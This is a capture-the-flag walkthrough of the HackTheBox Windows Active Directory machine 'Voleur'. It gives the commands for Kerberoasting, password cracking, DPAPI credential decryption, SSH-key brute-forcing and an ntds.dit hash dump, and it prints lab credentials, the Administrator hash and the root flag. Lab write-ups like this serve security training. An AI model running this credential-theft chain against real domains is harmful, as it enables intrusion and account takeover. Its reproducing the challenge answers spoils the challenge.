HackTheBox: Voleur

Box Info

• Name:Voleur
• OS: Windows-AD
• Difficulty: Medium
• IP: 10.10.11.76

Setup

mkdir -p ~/ctf/HackTheBox/voleur/scans && cd ~/ctf/HackTheBox/voleur

IP Address: 10.10.11.76

Add to /etc/hosts (requires sudo): echo "10.10.11.76 voleur.htb" | sudo tee -a /etc/hosts

10.10.11.76 voleur.htb

As this is a assumed breach scenario, we are provided with a low privilege account with credentials: ryan.naylor:HollowOct31Nyt

Enumeration

Fast sweep variant: nmap -sC -sV -p- -T4 --min-rate 2000 -vv voleur.htb -oN ~/ctf/HackTheBox/voleur/scans/nmap_fast_20250814-112058.txt

# nmap findings
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
2222/tcp  open  ssh              syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49669/tcp open  unknown          syn-ack ttl 127
55183/tcp open  unknown          syn-ack ttl 127
55184/tcp open  unknown          syn-ack ttl 127
55197/tcp open  unknown          syn-ack ttl 127
55203/tcp open  unknown          syn-ack ttl 127
55217/tcp open  unknown          syn-ack ttl 127

Using NetExec and given credentials we enumerate the following:

==We are unable to authenticate using password, lets get a kerberos TGT ticket using Impacket’s getTGT.py and export it to KRB5CCNAME variable :== getTGT.py voleur.htb/ryan.naylor:HollowOct31Nyt

Now we are able to authenticate successfully by providing a ticket. Lets enumerate using bloodhound nxc ldap 10.10.11.76 -d voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k --bloodhound -c All --dns-server 10.10.11.76

==We are unable to authenticate using the password. Let’s get a Kerberos TGT ticket using Impacket’s getTGT.py and export it to the KRB5CCNAME variable:== getTGT.py voleur.htb/ryan.naylor:HollowOct31Nyt

Now we are able to authenticate successfully by providing a ticket. Let’s enumerate using Bloodhound: nxc ldap 10.10.11.76 -d voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k --bloodhound -c All --dns-server 10.10.11.76

Let’s also get a users list so that we can see them individually on Bloodhound.

Administrator
Guest
krbtgt
ryan.naylor
marie.bryant
lacey.miller
svc_ldap
svc_backup
svc_iis
jeremy.combs
svc_winrm

While enumerating shares we find a share called IT where we have read permissions with ryan.

Using smbclient.py -k dc.voleur.htb we login as ryan as we have the ticket, we see it has a Access_review.xlsx file.

When we open the file we see it is password protected:

Using john we extract and crack the password : office2john Access_Review.xlsx john hash --wordlist=/usr/share/wordlists/rockyou.txt

now we can access the excel file and see accounts and passwords for service accounts

Looking in Bloodhound we see WriteSPN for svc_winrm and genericWrite for lacey.miller & an OU.

We try to run targetedKerberoast using python3 ~/tools/targetedKerberoast/targetedKerberoast.py -v -d 'voleur.htb' --dc-host dc.voleur.htb -k -u 'svc_ldap'

using hashcat we try to crack these hashes .\hashcat.exe .\kerb_hashes .\rockyou.txt

we were able to get the password for svc_winrm: svc_winrm:AFireInsidedeOzarctica980219afi

after exporting the ccache file to KRB5CCNAME variable in terminal i recieved the following error form winrm.

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure.  Minor code may provide more information                                                                                            
Cannot find KDC for realm "VOLEUR.HTB"

Using evil-winrm help command i got to know i had to set kdc realms in my /etc/krb5.conf file like below:

VOLEUR.HTB = { kdc = dc.voleur.htb }

after that i was able to get a shell as svc_winrm

User Flag

Location: C:\Users\svc_winrm\Desktop | Flag:

Privilege Escalation

==as we have the credentials for svc_ldap and in excel the password for todd.wolfe we can use bloodyAD to enable the disabled account as it is part of Second Line Support:==

==bloodyAD --host dc.voleur.htb -d voleur.htb -k -u svc_ldap -p M1XyC9pW7qT5Vn set restore todd.wolfe== (Alternate command which should have worked but didnt work) ==bloodyAD --host dc.voleur.htb -k -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn remove uac todd.wolfe -f ACCOUNTDISABLE==

now lets check the account with creds todd.wolfe:NightT1meP1dg3on14

Lets enumerate share for todd.wolfe:

Todd wolfe also has access to IT, will enumerate that for any info:

We have access to Second-Line Support folder, where we have the User folder for todd.wolfe backed up, using this article for DPAPI secrets, we find the master key and two credential files at:

/Second-Line Support/Archived Users/todd.wolfe/Appdata/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110

/Second-Line Support/Archived Users/todd.wolfe/Appdata/Roaming/Microsoft/Credentials

/Second-Line Support/Archived Users/todd.wolfe/Appdata/Local/Microsoft/Credentials

Lets get the SID for user todd.wolfe so that we can decrypt the master key: lookupsid.py -k dc.voleur.htb

Using dpapi.py masterkey -k -file masterkey -sid 'S-1-5-21-3927696377-1337352550-2781715495-1110' -password NightT1meP1dg3on14 we decrypt our masterkey:

![[Pasted image 20250815144131.png]](/images/post/Pasted image 20250815144131.png)

Using dpapi.py credential -file dpapi/772275FAD58525253490A9B0039791D3 -key '0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83'

We get the credentials for jeremy.combs:

jeremy.combs:qT3V9pLXyN7W4m

From the Access Control xlsx, we know Jeremy is a Third-Line-Support Technician and also has access to software folder. Lets enumerate his shares and since he is a Remote mgmt user we can also login through winrm.

![[Pasted image 20250815145343.png]](/images/post/Pasted image 20250815145343.png)

We have Read Access to IT.

in the IT share we find a note which says that the admin has enabled wsl for backups and also an id_rsa file is provided. This is a SSH private key.

from nmap result we know that port 2222 is running ssh.

Using hydra -L users -p id_rsa sshkey://10.10.11.76:2222 and this source file’s help we can bruteforce which user is the ssh key for: ![[Pasted image 20250815151856.png]](/images/post/Pasted image 20250815151856.png)

Now lets login and check : ![[Pasted image 20250815152956.png]](/images/post/Pasted image 20250815152956.png)

we have sudo access and as with wsl we know we can access all windows drive unrestricted.

In the IT/Third-Line-Support folder we find Backup folder containing ntds file and SYSTEM file, using which we can decrypt ntds using this SYSTEM file

We copy these files from svc_backup to our local machine using scp: scp -r -i id_rsa -v -P 2222 svc_backup@10.10.11.76:'/mnt/c/IT/Third-Line Support/Backups/Active Directory' .

scp -r -i id_rsa -v -P 2222 svc_backup@10.10.11.76:'/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM' .

Now we can utilise the secretdump.py file to decrypt the ntds file. secretsdump.py -k -ntds Active\ Directory/ntds.dit -system SYSTEM local

![[Pasted image 20250815221414.png]](/images/post/Pasted image 20250815221414.png)

We have the hash for Administrator account, now lets generate a TGT ticket and access winrm.

Administrator:e656e07c56d831611b577b160b259ad2

![[Pasted image 20250815221742.png]](/images/post/Pasted image 20250815221742.png)

Root Flag

Location: C:\Users\Administrator\Desktop | Flag: e6c516ba08e719863b37f0add790d88d